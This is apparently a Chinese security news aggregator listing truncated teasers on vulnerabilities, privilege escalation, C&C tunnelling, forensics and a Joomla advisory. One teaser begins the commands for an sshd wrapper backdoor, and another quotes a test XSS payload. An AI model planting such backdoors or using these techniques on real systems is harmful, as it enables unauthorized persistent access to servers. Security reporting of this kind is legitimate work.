聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队今年2月份,谷歌发布题为《知悉、预防、修复:开源漏洞相关讨论的新框架 (Know, Prevent, Fix: A framew...
每日攻防资讯简报[Mar.9th]
0x00漏洞1.BMC PATROL域用户提权漏洞https://www.securifera.com/blog/2021/03/08/bmc-patrol-agent-domain-user-to-...
打乱更新计划,影响数万用户,惊动国家安全委员会,挑起外交纷争?微软新漏洞不简单
能让微软赶在周二补丁日之前紧急发布补丁,这波漏洞有点东西。在安全圈,有些漏洞和攻击事件因为影响范围大、持续时间长,往往能演变成日更或者周更连续剧。前几年有 WannaCry 勒索病毒席卷全球、NSA ...
linux-wrapper跟inetd服务后门
wrapper后门实践先部署后门cd /usr/sbin/mv sshd ../bin/echo '#!/usr/bin/perl' >sshd...
第三方软件提权之FTP软件
转自安全鸭--------00X1 提权的号角拿到一个网站的webshell权限之后,可以控制整改网站,但是相对于整个系统来说权限较小。如果想要控制整个服务器,则需要进行系统提权,通过对此服务器的控制...
C&C的一些隐藏策略与防丢失
推荐一个repo:https://github.com/alphaSeclab/awesome-rat.git各种隧道,加密(icmp隧道/dns隧道/ssh隧道/http隧道)我们先介绍一下 ICM...
4 个使用率非常高的 Linux 监控工具
开源Linux翻译整理自https://reurl.cc/g8Qq7p下面是 Linux 下 4 个日常使用率非常高的监控工具,可以帮助我们准确快速的诊断系统问题。1. iotop如果你想知道某些进程...
【律师已置身于电子证据的时代】
来源:锦天城律师事务所,作者:陆凤阳随着社会现代化程度越来越高,电子支付,电子通讯的适用在我国越来越普及。人们对于电子设备的依赖也变得越来越强。自然而然,各种社会问题,法律纠纷往往涉及到各种各样的电子...
【一些图像挖掘相关工具】
来源:丁爸 情报分析师的工具箱1、imgops官网地址:http://imgops.com/这是一个综合图像挖掘和编辑工具,该工具整合了谷歌、必应、tineye · reddit · yandex ·...
【技侦证据】在最高法院刑诉法新解释中的进步
来源:尚权刑辩,作者:张雨 北京市尚权律师事务所合伙人、律师技侦证据是当下中国刑事诉讼中最为特殊的一类证据,一直是毒品类案件公正判决的重点、难点,乃至痛点,其在立法上的进步或退步直接关系到了众多毒品案...
PHP代码审计 wooyun-2010-00141
XSS反射型XSS先黑盒测一下,提取主页的链接这里以此为例/user.php?act=reg&from=先插个常规的payload,看看过滤情况<script>alert(1)&l...
【漏洞通告】Joomla后台代码执行漏洞(CVE-2021-23132)
漏洞名称 : Joomla远程代码执行漏洞组件名称 : Joomla威胁等级 : 高危影响范围 : 3.9.0<Joomla≤3.9.24漏洞类型 :&n...
24704